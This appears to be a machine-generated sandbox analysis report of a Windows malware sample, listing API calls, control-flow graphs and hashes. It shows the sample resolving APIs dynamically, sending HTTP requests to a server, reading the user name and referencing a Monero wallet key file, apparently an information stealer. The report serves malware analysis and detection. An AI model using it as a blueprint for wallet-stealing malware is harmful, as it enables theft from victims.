                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 49c7062c3eef25eb6ee3a70778395dd7050b2aee78787ed241aa32d983a415cf
                              • Instruction ID: b332e37331d11d93c7b2f97781c743451048b3702ec330a2cc825f9002a9df57
                              • Opcode Fuzzy Hash: 49c7062c3eef25eb6ee3a70778395dd7050b2aee78787ed241aa32d983a415cf
                              • Instruction Fuzzy Hash: ABA19DB5AAE2419FC344EFA8FE8895637F9F78C301704451BAA05C3264D63998E1FB16

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0079460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0079479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 007945C7, 007945D2, 007945DD, 007945E8, 007945F3, 00794617, 00794622, 0079462D, 00794638, 00794643, 00794657, 00794662, 0079466D, 00794678, 00794683, 007946AC, 007946B7, 007946C2, 007946CD, 007946D8, 00794713, 0079471E, 00794729, 00794734, 0079473F, 0079474F, 0079475A, 00794765, 00794770, 0079477B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, `$`-separated)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: d7c4390663057385953a539795739bd328084e0a8456565e9e6092d7c8508d2e
                              • Instruction ID: 046a4997f4e36e6002d3186b5330965b059978b6ce17cda0b955c1d1598f0434
                              • Opcode Fuzzy Hash: d7c4390663057385953a539795739bd328084e0a8456565e9e6092d7c8508d2e
                              • Instruction Fuzzy Hash: 4D4136A47D26047EC6A9BBA4A94EFDFB7565FD2704F445060EA0A52383CBB866004736

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (nodes: id address-range [subcalls and API calls]; edges: from->to)
                              • 801: 794880-794942 call 7aa7a0 call 7947b0 call 7aa740 * 5 InternetOpenA StrCmpCA
                              • 816: 79494b-79494f
                              • 817: 794944
                              • 818: 794ecb-794ef3 InternetCloseHandle call 7aaad0 call 799ac0
                              • 819: 794955-794acd call 7a8b60 call 7aa920 call 7aa8a0 call 7aa800 * 2 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa920 call 7aa8a0 call 7aa800 * 2 InternetConnectA
                              • 829: 794f32-794fa2 call 7a8990 * 2 call 7aa7a0 call 7aa800 * 8
                              • 830: 794ef5-794f2d call 7aa820 call 7aa9b0 call 7aa8a0 call 7aa800
                              • 905: 794ad3-794ad7
                              • 906: 794ad9-794ae3
                              • 907: 794ae5
                              • 908: 794aef-794b22 HttpOpenRequestA
                              • 909: 794b28-794e28 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa9b0 call 7aa8a0 call 7aa800 call 7aa920 call 7aa8a0 call 7aa800 call 7aa740 call 7aa920 * 2 call 7aa8a0 call 7aa800 * 2 call 7aaad0 lstrlen call 7aaad0 * 2 lstrlen call 7aaad0 HttpSendRequestA
                              • 910: 794ebe-794ec5 InternetCloseHandle
                              • 1021: 794e32-794e5c InternetReadFile
                              • 1022: 794e5e-794e65
                              • 1023: 794e67-794eb9 InternetCloseHandle call 7aa800
                              • 1025: 794e69-794ea7 call 7aa9b0 call 7aa8a0 call 7aa800
                              • Edges: 801->816, 801->817, 816->818, 816->819, 817->816, 818->829, 818->830, 819->818, 819->905, 830->829, 905->906, 905->907, 906->908, 907->908, 908->909, 908->910, 909->1021, 910->818, 1021->1022, 1021->1023, 1022->1023, 1022->1025, 1023->910, 1025->1021
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00794915
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 0079493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00794ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,007B0DDB,00000000,?,?,00000000,?,",00000000,?,014CEA28), ref: 00794DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00794E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00794E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00794E49
                              • InternetCloseHandle.WININET(00000000), ref: 00794EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00794EC5
                              • HttpOpenRequestA.WININET(00000000,014CE958,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00794B15
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • InternetCloseHandle.WININET(00000000), ref: 00794ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 6a58c8190860eccf87b91a8712e5e89ff3680c99ffe5e81f64b98e5b63c49e3d
                              • Instruction ID: fd95c41b765930fc990b6deb021f9dc6b6b78093a7ea93a9ec6da2240f7ee595
                              • Opcode Fuzzy Hash: 6a58c8190860eccf87b91a8712e5e89ff3680c99ffe5e81f64b98e5b63c49e3d
                              • Instruction Fuzzy Hash: B812BE71911118EADB55EB90DC9AFEEB378BF95300F5042A9B10662091EF783F49CF62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: de7b4f054ab80a2c7a2e10fe54e8952f720c316f6d4388fad43f9e0a539a8feb
                              • Instruction ID: ee79f798b713a0932ff14fc99af68745d3839a5bc99e205a6f64d29e7d54eb4a
                              • Opcode Fuzzy Hash: de7b4f054ab80a2c7a2e10fe54e8952f720c316f6d4388fad43f9e0a539a8feb
                              • Instruction Fuzzy Hash: 64F04FF1D48208ABC714DF98DD49BAEBBB8EB45711F10025AFA05A2680C7781944CBA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: ca844717552df7e3d4ed932bfbdcb7d9f65a9bf5e729b90b9b7af41831df8fbd
                              • Instruction ID: 43868d13301940c911387f4d9c71636f51511343feb5ee5d4fd4c225ffc696a5
                              • Opcode Fuzzy Hash: ca844717552df7e3d4ed932bfbdcb7d9f65a9bf5e729b90b9b7af41831df8fbd
                              • Instruction Fuzzy Hash: 48D05E74D4530CDBCB00DFE0D8496DDBBB8FB08312F000595D90562340EA3058E1CAA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (nodes: id address-range [API calls]; edges: from->to)
                              • 633: 7a9c10-7a9c1a
                              • 634: 7a9c20-7aa031 GetProcAddress * 43
                              • 635: 7aa036-7aa0ca LoadLibraryA * 8
                              • 636: 7aa0cc-7aa141 GetProcAddress * 5
                              • 637: 7aa146-7aa14d
                              • 638: 7aa153-7aa211 GetProcAddress * 8
                              • 639: 7aa216-7aa21d
                              • 640: 7aa298-7aa29f
                              • 641: 7aa21f-7aa293 GetProcAddress * 5
                              • 642: 7aa337-7aa33e
                              • 643: 7aa2a5-7aa332 GetProcAddress * 6
                              • 644: 7aa41f-7aa426
                              • 645: 7aa344-7aa41a GetProcAddress * 9
                              • 646: 7aa428-7aa49d GetProcAddress * 5
                              • 647: 7aa4a2-7aa4a9
                              • 648: 7aa4ab-7aa4d7 GetProcAddress * 2
                              • 649: 7aa4dc-7aa4e3
                              • 650: 7aa515-7aa51c
                              • 651: 7aa4e5-7aa510 GetProcAddress * 2
                              • 652: 7aa612-7aa619
                              • 653: 7aa522-7aa60d GetProcAddress * 10
                              • 654: 7aa61b-7aa678 GetProcAddress * 4
                              • 655: 7aa67d-7aa684
                              • 656: 7aa69e-7aa6a5
                              • 657: 7aa686-7aa699 GetProcAddress
                              • 658: 7aa708-7aa709
                              • 659: 7aa6a7-7aa703 GetProcAddress * 4
                              • Edges: 633->634, 633->635, 634->635, 635->636, 635->637, 636->637, 637->638, 637->639, 638->639, 639->640, 639->641, 640->642, 640->643, 641->640, 642->644, 642->645, 643->642, 644->646, 644->647, 645->644, 646->647, 647->648, 647->649, 648->649, 649->650, 649->651, 650->652, 650->653, 651->650, 652->654, 652->655, 653->652, 655->656, 655->657, 656->658, 656->659, 657->656, 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014B5430), ref: 007A9C2D
                              • GetProcAddress.KERNEL32(74DD0000,014B5250), ref: 007A9C45
                              • GetProcAddress.KERNEL32(74DD0000,014C9550), ref: 007A9C5E
                              • GetProcAddress.KERNEL32(74DD0000,014C9388), ref: 007A9C76
                              • GetProcAddress.KERNEL32(74DD0000,014C9268), ref: 007A9C8E
                              • GetProcAddress.KERNEL32(74DD0000,014C93D0), ref: 007A9CA7
                              • GetProcAddress.KERNEL32(74DD0000,014BB9D0), ref: 007A9CBF
                              • GetProcAddress.KERNEL32(74DD0000,014CCFA0), ref: 007A9CD7
                              • GetProcAddress.KERNEL32(74DD0000,014CCE20), ref: 007A9CF0
                              • GetProcAddress.KERNEL32(74DD0000,014CCF58), ref: 007A9D08
                              • GetProcAddress.KERNEL32(74DD0000,014CCFD0), ref: 007A9D20
                              • GetProcAddress.KERNEL32(74DD0000,014B5450), ref: 007A9D39
                              • GetProcAddress.KERNEL32(74DD0000,014B5470), ref: 007A9D51
                              • GetProcAddress.KERNEL32(74DD0000,014B54F0), ref: 007A9D69
                              • GetProcAddress.KERNEL32(74DD0000,014B5530), ref: 007A9D82
                              • GetProcAddress.KERNEL32(74DD0000,014CD048), ref: 007A9D9A
                              • GetProcAddress.KERNEL32(74DD0000,014CCDF0), ref: 007A9DB2
                              • GetProcAddress.KERNEL32(74DD0000,014BBB38), ref: 007A9DCB
                              • GetProcAddress.KERNEL32(74DD0000,014B5550), ref: 007A9DE3
                              • GetProcAddress.KERNEL32(74DD0000,014CD030), ref: 007A9DFB
                              • GetProcAddress.KERNEL32(74DD0000,014CCFB8), ref: 007A9E14
                              • GetProcAddress.KERNEL32(74DD0000,014CCE38), ref: 007A9E2C
                              • GetProcAddress.KERNEL32(74DD0000,014CD018), ref: 007A9E44
                              • GetProcAddress.KERNEL32(74DD0000,014B5590), ref: 007A9E5D
                              • GetProcAddress.KERNEL32(74DD0000,014CCE50), ref: 007A9E75
                              • GetProcAddress.KERNEL32(74DD0000,014CCE08), ref: 007A9E8D
                              • GetProcAddress.KERNEL32(74DD0000,014CCFE8), ref: 007A9EA6
                              • GetProcAddress.KERNEL32(74DD0000,014CD078), ref: 007A9EBE
                              • GetProcAddress.KERNEL32(74DD0000,014CCF70), ref: 007A9ED6
                              • GetProcAddress.KERNEL32(74DD0000,014CD060), ref: 007A9EEF
                              • GetProcAddress.KERNEL32(74DD0000,014CD000), ref: 007A9F07
                              • GetProcAddress.KERNEL32(74DD0000,014CCEE0), ref: 007A9F1F
                              • GetProcAddress.KERNEL32(74DD0000,014CCE68), ref: 007A9F38
                              • GetProcAddress.KERNEL32(74DD0000,014CA940), ref: 007A9F50
                              • GetProcAddress.KERNEL32(74DD0000,014CCE80), ref: 007A9F68
                              • GetProcAddress.KERNEL32(74DD0000,014CCE98), ref: 007A9F81
                              • GetProcAddress.KERNEL32(74DD0000,014B55D0), ref: 007A9F99
                              • GetProcAddress.KERNEL32(74DD0000,014CCF28), ref: 007A9FB1
                              • GetProcAddress.KERNEL32(74DD0000,014B5270), ref: 007A9FCA
                              • GetProcAddress.KERNEL32(74DD0000,014CD090), ref: 007A9FE2
                              • GetProcAddress.KERNEL32(74DD0000,014CD0A8), ref: 007A9FFA
                              • GetProcAddress.KERNEL32(74DD0000,014B5290), ref: 007AA013
                              • GetProcAddress.KERNEL32(74DD0000,014B5670), ref: 007AA02B
                              • LoadLibraryA.KERNEL32(014CD0C0,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA03D
                              • LoadLibraryA.KERNEL32(014CCDD8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA04E
                              • LoadLibraryA.KERNEL32(014CCEF8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA060
                              • LoadLibraryA.KERNEL32(014CCEB0,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA072
                              • LoadLibraryA.KERNEL32(014CCEC8,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA083
                              • LoadLibraryA.KERNEL32(014CCF40,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA095
                              • LoadLibraryA.KERNEL32(014CCF10,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA0A7
                              • LoadLibraryA.KERNEL32(014CCF88,?,007A5CA3,007B0AEB,?,?,?,?,?,?,?,?,?,?,007B0AEA,007B0AE3), ref: 007AA0B8
                              • GetProcAddress.KERNEL32(75290000,014B5650), ref: 007AA0DA
                              • GetProcAddress.KERNEL32(75290000,014CD258), ref: 007AA0F2
                              • GetProcAddress.KERNEL32(75290000,014C8E90), ref: 007AA10A
                              • GetProcAddress.KERNEL32(75290000,014CD138), ref: 007AA123
                              • GetProcAddress.KERNEL32(75290000,014B5850), ref: 007AA13B
                              • GetProcAddress.KERNEL32(6FD40000,014BB8E0), ref: 007AA160
                              • GetProcAddress.KERNEL32(6FD40000,014B58B0), ref: 007AA179
                              • GetProcAddress.KERNEL32(6FD40000,014BBC00), ref: 007AA191
                              • GetProcAddress.KERNEL32(6FD40000,014CD180), ref: 007AA1A9
                              • GetProcAddress.KERNEL32(6FD40000,014CD2A0), ref: 007AA1C2
                              • GetProcAddress.KERNEL32(6FD40000,014B57B0), ref: 007AA1DA
                              • GetProcAddress.KERNEL32(6FD40000,014B5810), ref: 007AA1F2
                              • GetProcAddress.KERNEL32(6FD40000,014CD1B0), ref: 007AA20B
                              • GetProcAddress.KERNEL32(752C0000,014B58D0), ref: 007AA22C
                              • GetProcAddress.KERNEL32(752C0000,014B5690), ref: 007AA244
                              • GetProcAddress.KERNEL32(752C0000,014CD2D0), ref: 007AA25D
                              • GetProcAddress.KERNEL32(752C0000,014CD198), ref: 007AA275
                              • GetProcAddress.KERNEL32(752C0000,014B5630), ref: 007AA28D
                              • GetProcAddress.KERNEL32(74EC0000,014BBA20), ref: 007AA2B3
                              • GetProcAddress.KERNEL32(74EC0000,014BBC28), ref: 007AA2CB
                              • GetProcAddress.KERNEL32(74EC0000,014CD270), ref: 007AA2E3
                              • GetProcAddress.KERNEL32(74EC0000,014B56B0), ref: 007AA2FC
                              • GetProcAddress.KERNEL32(74EC0000,014B58F0), ref: 007AA314
                              • GetProcAddress.KERNEL32(74EC0000,014BB868), ref: 007AA32C
                              • GetProcAddress.KERNEL32(75BD0000,014CD210), ref: 007AA352
                              • GetProcAddress.KERNEL32(75BD0000,014B56D0), ref: 007AA36A
                              • GetProcAddress.KERNEL32(75BD0000,014C8EB0), ref: 007AA382
                              • GetProcAddress.KERNEL32(75BD0000,014CD3C0), ref: 007AA39B
                              • GetProcAddress.KERNEL32(75BD0000,014CD1F8), ref: 007AA3B3
                              • GetProcAddress.KERNEL32(75BD0000,014B5830), ref: 007AA3CB
                              • GetProcAddress.KERNEL32(75BD0000,014B5910), ref: 007AA3E4
                              • GetProcAddress.KERNEL32(75BD0000,014CD1C8), ref: 007AA3FC
                              • GetProcAddress.KERNEL32(75BD0000,014CD360), ref: 007AA414
                              • GetProcAddress.KERNEL32(75A70000,014B5890), ref: 007AA436
                              • GetProcAddress.KERNEL32(75A70000,014CD2B8), ref: 007AA44E
                              • GetProcAddress.KERNEL32(75A70000,014CD1E0), ref: 007AA466
                              • GetProcAddress.KERNEL32(75A70000,014CD330), ref: 007AA47F
                              • GetProcAddress.KERNEL32(75A70000,014CD150), ref: 007AA497
                              • GetProcAddress.KERNEL32(75450000,014B5730), ref: 007AA4B8
                              • GetProcAddress.KERNEL32(75450000,014B5770), ref: 007AA4D1
                              • GetProcAddress.KERNEL32(75DA0000,014B5930), ref: 007AA4F2
                              • GetProcAddress.KERNEL32(75DA0000,014CD288), ref: 007AA50A
                              • GetProcAddress.KERNEL32(6F070000,014B56F0), ref: 007AA530
                              • GetProcAddress.KERNEL32(6F070000,014B5790), ref: 007AA548
                              • GetProcAddress.KERNEL32(6F070000,014B5710), ref: 007AA560
                              • GetProcAddress.KERNEL32(6F070000,014CD2E8), ref: 007AA579
                              • GetProcAddress.KERNEL32(6F070000,014B5950), ref: 007AA591
                              • GetProcAddress.KERNEL32(6F070000,014B5750), ref: 007AA5A9
                              • GetProcAddress.KERNEL32(6F070000,014B57D0), ref: 007AA5C2
                              • GetProcAddress.KERNEL32(6F070000,014B57F0), ref: 007AA5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 007AA5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 007AA607
                              • GetProcAddress.KERNEL32(75AF0000,014CD0D8), ref: 007AA629
                              • GetProcAddress.KERNEL32(75AF0000,014C8EA0), ref: 007AA641
                              • GetProcAddress.KERNEL32(75AF0000,014CD228), ref: 007AA659
                              • GetProcAddress.KERNEL32(75AF0000,014CD240), ref: 007AA672
                              • GetProcAddress.KERNEL32(75D90000,014B5870), ref: 007AA693
                              • GetProcAddress.KERNEL32(6E330000,014CD120), ref: 007AA6B4
                              • GetProcAddress.KERNEL32(6E330000,014B5970), ref: 007AA6CD
                              • GetProcAddress.KERNEL32(6E330000,014CD0F0), ref: 007AA6E5
                              • GetProcAddress.KERNEL32(6E330000,014CD300), ref: 007AA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 9bed9bc36296f953c95db3b44940c174ed61dbd0e56f4b2c587f59064c7f27ab
                              • Instruction ID: a3a230f7e9704f8b23c07f1a22a3dc5750ff5ac4b0b28481a5df4dddc22845c3
                              • Opcode Fuzzy Hash: 9bed9bc36296f953c95db3b44940c174ed61dbd0e56f4b2c587f59064c7f27ab
                              • Instruction Fuzzy Hash: 11624DB5AAA241AFC744DFA8ED8895637F9F78C301304851BA609C3274D73999E1FF12

                              Control-flow Graph

                              • [Graph image: control-flow graph of function 00796280 (basic blocks 796280 to 79652d), calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle; legend: Executed / Not Executed]
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                              • HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007963FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0079646D
                              • InternetCloseHandle.WININET(00000000), ref: 007964EF
                              • InternetCloseHandle.WININET(00000000), ref: 007964F9
                              • InternetCloseHandle.WININET(00000000), ref: 00796503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 4cc23e28d8751c23c30380510e996bddf3d931a115341fd368cc0dc059684357
                              • Instruction ID: c88f72485f932ddecb2ea623aaaaf2808cf867cfeb530843a0a31177e5483dc6
                              • Opcode Fuzzy Hash: 4cc23e28d8751c23c30380510e996bddf3d931a115341fd368cc0dc059684357
                              • Instruction Fuzzy Hash: BB715D71A50218EBDF24DFA0DC49BEE77B8BB44700F108299F50A6B190DBB86A85DF51

                              Control-flow Graph

                              • [Graph image: control-flow graph of function 007A5510 (basic blocks 7a5510 to 7a5ac6), calling StrCmpCA repeatedly and Sleep; legend: Executed / Not Executed]
                              APIs
                                • Part of subcall function 007AA820: lstrlen.KERNEL32(00794F05,?,?,00794F05,007B0DDE), ref: 007AA82B
                                • Part of subcall function 007AA820: lstrcpy.KERNEL32(007B0DDE,00000000), ref: 007AA885
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5857
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5228
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5318
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A532F
                                • Part of subcall function 007A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 007A5364
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A5383
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 007A5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8ef1038424ded5a292af9afe512869ab95a23150c589de7f2f239a1e6fa26f2f
                              • Instruction ID: dd9afa0c38d86f3a84980ad3eee1fad2a0807fe56478fd82d1019848046f9751
